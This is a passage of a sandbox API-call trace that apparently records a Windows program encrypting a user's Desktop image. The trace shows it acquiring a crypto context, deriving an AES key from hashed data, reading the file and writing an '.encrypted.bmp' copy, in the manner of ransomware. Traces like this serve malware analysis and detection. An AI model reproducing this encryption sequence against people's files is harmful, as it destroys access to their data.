[0032.162] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.162] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.162] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x3c201e00, ftLastWriteTime.dwHighDateTime=0x1d5c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0x7c2100 [0032.163] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.163] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.163] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.163] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.164] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.164] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.164] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.164] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.164] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.165] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.165] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0032.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.165] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.165] CryptDestroyHash (hHash=0x7c2240) returned 1 [0032.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xhmpo 5df6plfz4yar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.165] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.165] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.166] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.166] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.168] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xhmpo 5df6plfz4yar.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0032.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.170] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.170] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.171] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x482c, lpOverlapped=0x0) returned 1 [0032.171] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1482c) returned 0x955018 [0032.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0032.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1482c) returned 0x88ffb0 [0032.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1482c) returned 0x955018 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.178] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.178] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1482c) returned 0x955018 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.178] RtlAllocateHeap 